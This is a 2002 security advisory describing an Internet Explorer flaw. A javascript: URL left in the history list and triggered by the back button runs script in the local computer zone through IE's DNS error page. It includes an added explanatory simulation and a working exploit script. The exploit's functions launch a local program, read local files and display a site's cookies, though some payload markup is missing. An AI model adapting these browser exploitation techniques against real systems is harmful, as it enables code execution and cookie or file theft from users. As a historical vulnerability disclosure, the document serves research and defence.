
Using the backbutton in IE is dangerous

by Nikola Strahija on April 15th, 2002

IE keeps URLs that use the javascript: protocol in the history list. Code injected through such a URL runs in the same zone/domain as the last URL viewed, and the javascript: URL can be made to trigger when the user presses the back button.


The normal behaviour when a page fails to load is to press the back button.
The error page shown by IE is rendered in the Local computer zone
(res://C:\WINNT\System32\shdoclc.dll/dnserror.htm# on Win2000), so script
that runs in that context can execute code and read local files.
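To make the sequence concrete, the following is an added model of the navigation described above. It is not the advisory's code and not anything Internet Explorer ships: a toy history list in which every entry carries the security zone it was rendered in, so the zone confusion behind the back-button trick can be traced offline. The zone names and the error page path come from the advisory; ToyBrowser, runScenario and the attacker.example URL are assumptions made for the model.

```javascript
// Added model (not IE code, not the advisory's code): a history list whose
// entries carry the security zone they were rendered in. Zone names and the
// error page path are taken from the advisory; the rest is made up here.

const ZONE_INTERNET = "Internet";
const ZONE_LOCAL = "Local computer";
const DNS_ERROR_PAGE = "res://C:\\WINNT\\System32\\shdoclc.dll/dnserror.htm";

class ToyBrowser {
  constructor(startUrl) {
    this.history = [{ url: startUrl, zone: ZONE_INTERNET, title: startUrl }];
    this.executed = []; // {payload, zone} for every payload that ran
  }
  get current() { return this.history[this.history.length - 1]; }

  // Ordinary navigation. http(s) loads in the Internet zone; a URL that cannot
  // load ("res:" or a non-existent host in the advisory) is replaced by the DNS
  // error page, which IE renders in the Local computer zone.
  navigate(url, title) {
    const scheme = url.split(":")[0].toLowerCase();
    const loads = scheme === "http" || scheme === "https";
    this.history.push(loads
      ? { url, zone: ZONE_INTERNET, title: title || url }
      : { url: DNS_ERROR_PAGE, zone: ZONE_LOCAL, title: title || url });
  }

  // javascript: navigation. The code runs in the zone of the page on screen.
  // If it returns page content (modelled as a function), that content becomes
  // a history entry keyed by the javascript: URL, and its script then runs.
  navigateScript(code) {
    const content = code(this, this.current.zone);
    if (typeof content === "function") {
      this.history.push({ url: "javascript:...", zone: this.current.zone, code });
      content(this);
    }
  }

  // open('javascript:document.write(payload)') in the advisory: the new window
  // inherits the zone the opener is currently executing in.
  open(payload, zone) { this.executed.push({ payload, zone }); }

  // Back button. The previous entry is re-entered; for a javascript: entry the
  // code is re-evaluated, in the zone of the page that was on screen when the
  // button was pressed.
  back() {
    const zoneBefore = this.current.zone;
    this.history.pop();
    if (this.current && this.current.code) this.current.code(this, zoneBefore);
  }
}

// The advisory's backBug() with its javascript: URL string turned into a closure.
function backBug(browser, badUrl, payload) {
  const len = browser.history.length;
  const page = browser.current.url;
  browser.navigateScript((b, zone) => {
    if (b.history.length !== len) { // second visit, entered via the back button
      b.open(payload, zone);
      b.back();
      return undefined;
    }
    // first visit: page content whose script leaves for badUrl and spoofs the title
    return (b2) => b2.navigate(badUrl, page);
  });
}

// Click the link, then press the back button; report where the payload ran.
function runScenario(badUrl) {
  const b = new ToyBrowser("http://attacker.example/"); // constructed sample page
  backBug(b, badUrl, "PAYLOAD");
  const titleShown = b.current.title; // what the user sees before pressing back
  b.back();
  return {
    payloadZone: b.executed.length ? b.executed[0].zone : null,
    titleShown,
    landedOn: b.current.url,
  };
}

console.log(runScenario("res:"));                  // payload runs in the Local computer zone
console.log(runScenario("http://www.example.com/")); // a URL that loads keeps it in the Internet zone
```

The contrast between the two calls is the whole point of the advisory: the javascript: entry itself has no zone, so what matters is the zone of whatever was on screen when the back button was pressed, and choosing a URL that fails to load puts the local-zone error page there.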


EXPLOIT:
========
The exploit works as follows: press one of the links and then the back
button.

Note: the exploit has only been tested on fully patched IE 6.0 on Win XP
and Win2000 Pro (other OS versions are assumed to be vulnerable too).
winmine.exe and test.txt must exist.

--------------------------CUT HERE-------------------------------

Press link and then the backbutton to trigger script.

Run Minesweeper (c:/winnt/system32/winmine.exe Win2000 pro)
Run Minesweeper (c:/windows/system32/winmine.exe XP, ME etc...)
Read c:\test.txt (needs to be created)
Read Google cookie



// badUrl = "http://www.nonexistingdomain.se"; // Use if not XP
badUrl = "res:";   // fails to load, so IE shows the Local computer zone error page

function execFile(file){
  // HTML payload written into the new window (markup lost in this copy of the advisory)
  s = '';
  backBug(badUrl,s);
}
function readFile(file){
  // HTML payload written into the new window (markup lost in this copy of the advisory)
  s = '';
  backBug(badUrl,s);
}
function readCookie(url){
  // url must load, so the payload ends up in that site's domain instead of the local zone
  s = '<script>alert(document.cookie);close();</script>';
  backBug(url,s);
}
function backBug(url,payload){
  len = history.length;       // history length at click time
  page = document.location;   // used to spoof the title of the decoy page
  // javascript: URL that stays in the history list. First visit (length
  // unchanged): evaluates to a page whose script navigates to url and sets the
  // title to the original location. Second visit, via the back button (length
  // changed): writes payload into a new window, which inherits the zone of the
  // page just left, then steps back once more.
  s = "javascript:if (history.length!="+len+") {";
  s+= "open('javascript:document.write(\""+payload+"\")')";
  s+= ";history.back();} else '<script>location=\""+url
  s+= "\";document.title=\""+page+"\";</script>';";
  location = s;
}


--------------------------CUT HERE-------------------------------


Disclaimer:
===========
Andreas Sandblad is not responsible for the misuse of the
information provided in this advisory. The opinions expressed
are my own and not of any company. In no event shall the author
be liable for any damages whatsoever arising out of or in
connection with the use or spread of this advisory. Any use of
the information is at the user's own risk.

